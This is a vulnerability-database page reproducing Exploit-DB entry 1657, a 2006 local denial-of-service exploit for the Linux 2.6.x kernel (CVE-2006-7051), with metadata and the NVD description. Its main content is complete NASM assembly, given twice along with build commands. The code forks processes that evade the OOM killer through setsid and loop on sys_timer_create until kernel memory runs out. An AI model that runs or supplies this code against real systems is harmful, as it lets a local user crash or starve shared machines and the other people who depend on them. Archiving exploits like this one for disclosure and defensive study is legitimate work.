Search...

Linux Kernel 2.6.x - sys_timer_create Local Denial of Service Exploit

2006-04-09T00:00:00

ID EDB-ID:1657
Type exploitdb
Reporter fingerout
Modified 2006-04-09T00:00:00

Description

Linux Kernel 2.6.x sys_timer_create() Local Denial of Service Exploit. CVE-2006-7051. Dos exploit for linux platform

                                        
                                            ;nasm -f elf noHeaven.asm
;ld -s -o noHeaven noHeaven.o

section .text
   global _start

count   equ     8       ; threads count - do it quicker

_start:
       mov     ebx, count
       call    create_threads
       jmp     done
_pause:
       mov     eax,29
       int     0x80
       ret
create_threads:
       mov     eax,2
       int     0x80
       test    eax,eax
       jz      consume
       dec     ebx
       test    ebx,ebx
       jnz     create_threads
       ret
consume:
setsid:         ;       so we won't get counted as one thread in oom_killer()
       xor     ebx,ebx ;       each task will have about 20 oom_score which
       mov     eax,66 ;        is less than 'init' and others
       int     0x80
       push    eax
loopek:
       mov     eax,259
       mov     ebx,0
       mov     ecx,0
       mov     edx,esp
       int     0x80
       jmp     loopek
done:
       xor     ebx,ebx
       mov     eax,1
       int     0x80

; milw0rm.com [2006-04-09]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:1657", "hash": "0908137198defb8ead1b9d9744bad66e", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Linux Kernel 2.6.x - sys_timer_create Local Denial of Service Exploit", "description": "Linux Kernel 2.6.x sys_timer_create() Local Denial of Service Exploit. CVE-2006-7051. Dos exploit for linux platform", "published": "2006-04-09T00:00:00", "modified": "2006-04-09T00:00:00", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/1657/", "reporter": "fingerout", "references": [], "cvelist": ["CVE-2006-7051"], "lastseen": "2016-01-31T14:37:54", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.2, "vector": "NONE", "modified": "2016-01-31T14:37:54"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-7051"]}], "modified": "2016-01-31T14:37:54"}, "vulnersScore": 5.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/1657/", "sourceData": ";nasm -f elf noHeaven.asm\n;ld -s -o noHeaven noHeaven.o\n\nsection .text\n global _start\n\ncount equ 8 ; threads count - do it quicker\n\n_start:\n mov ebx, count\n call create_threads\n jmp done\n_pause:\n mov eax,29\n int 0x80\n ret\ncreate_threads:\n mov eax,2\n int 0x80\n test eax,eax\n jz consume\n dec ebx\n test ebx,ebx\n jnz create_threads\n ret\nconsume:\nsetsid: ; so we won't get counted as one thread in oom_killer()\n xor ebx,ebx ; each task will have about 20 oom_score which\n mov eax,66 ; is less than 'init' and others\n int 0x80\n push eax\nloopek:\n mov eax,259\n mov ebx,0\n mov ecx,0\n mov edx,esp\n int 0x80\n jmp loopek\ndone:\n xor ebx,ebx\n mov eax,1\n int 0x80\n\n; milw0rm.com [2006-04-09]\n", "osvdbidlist": ["40963"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:08:35", "bulletinFamily": "NVD", "description": "The sys_timer_create function in posix-timers.c for Linux kernel 2.6.x allows local users to cause a denial of service (memory consumption) and possibly bypass memory limits or cause other processes to be killed by creating a large number of posix timers, which are allocated in kernel memory but are not treated as part of the process' memory.", "modified": "2018-10-30T16:25:00", "id": "CVE-2006-7051", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7051", "published": "2007-02-24T00:28:00", "title": "CVE-2006-7051", "type": "cve", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}]}